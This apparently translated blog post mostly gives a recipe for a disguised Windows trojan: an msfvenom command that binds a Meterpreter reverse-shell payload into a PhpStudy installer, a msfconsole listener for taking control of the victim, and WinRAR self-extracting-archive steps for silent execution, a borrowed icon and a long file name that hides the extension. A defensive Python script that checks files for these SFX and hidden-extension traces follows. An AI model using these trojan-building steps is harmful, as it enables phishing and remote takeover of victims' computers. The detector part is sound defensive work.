This article has been moved to my own blog: https://www.xy586.top
Bundled Trojan
Use msfvenom to generate the trojan program:
# Generate the trojan file
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.138 -f exe -x /root/PhpStudy2018.exe -o /root/phpstudy.exe
Copy the trojan file onto the target machine
# Set up the listener for the reverse connection
msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.232.138
set lport 4444
run
Double-click the trojan program to run it; the listening port receives the callback and the computer is now under control.
Type shell in the Meterpreter session to get a command prompt with full control of the computer
RAR self-extracting archive
Configure the self-extracting behaviour
Set the RAR self-extracting (SFX) format so that the malicious program runs when the archive is unpacked
Simulate a text-document phishing lure
Improved trojan program:
Disguise: bundle the web page code together with the app, compress them, and use WinRAR to create a self-extracting (SFX) archive
Click Advanced and, in the General tab of the SFX options, add the extraction path,
In the Setup tab, fill in the programs to run before and after extraction,
In the Modes tab, under Silent mode, select Hide all
Use BeCyIconGrabber.exe to extract the icon (.ico) of the software we want to imitate
In the Text and icon tab, load the icon we just extracted
This produces the disguised trojan program
The file name can also be made much longer: when the file is not selected, the tail of a long name is hidden, so the extension is no longer visible
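The SFX disguise described above leaves static traces that a defender can look for without running the file: an executable (PE) that carries a RAR archive signature after its own headers, clear-text SFX script directives such as Setup= and Silent= in the archive comment, and an executable extension hidden behind a long run of spaces or a second extension. The following Python script is an added example (not code from the original post) that checks a file for those traces; the sample "PE" blob and the file names it is run against are constructed inline so it runs offline. It is a heuristic only: the directive check only catches SFX comments stored uncompressed, and a backdoored template built with msfvenom -x is not detectable this way.

```python
import re

# Common prefix of the RAR 4.x (Rar!\x1a\x07\x00) and RAR 5 (Rar!\x1a\x07\x01\x00) signatures
RAR_MAGIC = b"Rar!\x1a\x07"
# WinRAR SFX script directives that appear in clear text when the archive comment is stored uncompressed
SFX_DIRECTIVES = (b"Setup=", b"Silent=", b"TempMode", b"Path=", b"Overwrite=")
EXEC_EXTENSIONS = {"exe", "scr", "com", "pif", "bat", "cmd", "vbs", "js", "msi"}


def is_pe(data: bytes) -> bool:
    """True if data starts with a DOS header whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def find_embedded_rar(data: bytes) -> int:
    """Offset of the first RAR signature inside data, or -1 if there is none."""
    return data.find(RAR_MAGIC)


def sfx_directives(data: bytes, start: int) -> list[str]:
    """SFX script directives visible in clear text after the archive signature (sorted)."""
    tail = data[start:]
    return sorted(d.decode() for d in SFX_DIRECTIVES if d in tail)


def filename_findings(name: str) -> list[str]:
    """Flag names that make an executable look like a document."""
    findings = []
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    if len(parts) < 2:
        return findings
    ext = parts[-1].strip()
    if ext in EXEC_EXTENSIONS:
        if len(parts) >= 3:
            findings.append(f"double extension: .{parts[-2]}.{ext}")
        if re.search(r"\s{5,}", base):
            findings.append("long run of spaces before the executable extension")
        if len(base) > 60:
            findings.append("unusually long file name with executable extension")
    return findings


def assess(name: str, data: bytes) -> dict:
    """Combine the PE, embedded-archive and file-name checks into one report."""
    report = {"pe": is_pe(data), "sfx": False, "directives": [], "name": filename_findings(name)}
    if report["pe"]:
        offset = find_embedded_rar(data)
        if offset != -1:
            report["sfx"] = True
            report["directives"] = sfx_directives(data, offset)
    report["suspicious"] = report["sfx"] or bool(report["name"])
    return report


def build_fake_pe(payload: bytes = b"") -> bytes:
    """Constructed test input: a minimal DOS header + PE signature followed by payload bytes."""
    header = bytearray(0x40)
    header[0:2] = b"MZ"
    header[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> right after this header
    return bytes(header) + b"PE\x00\x00" + payload


# Constructed samples: an SFX-like executable with an uncompressed script comment, and a plain one
SAMPLE_SFX = build_fake_pe(
    b"Rar!\x1a\x07\x00" + b"Setup=PLACEHOLDER_PROGRAM.exe\r\nSilent=1\r\nTempMode\r\n" + b"\x00" * 16
)
SAMPLE_CLEAN = build_fake_pe(b"\x00" * 64)

if __name__ == "__main__":
    for fname, blob in (("PhpStudy2018                                .exe", SAMPLE_SFX),
                        ("setup.exe", SAMPLE_CLEAN)):
        print(fname.strip(), "->", assess(fname, blob))
```

In practice the same checks can be run over a mail gateway's attachment directory or a download folder; a hit on the SFX directives is worth quarantining, while a file-name hit alone is a good trigger for user-facing warnings about hidden extensions.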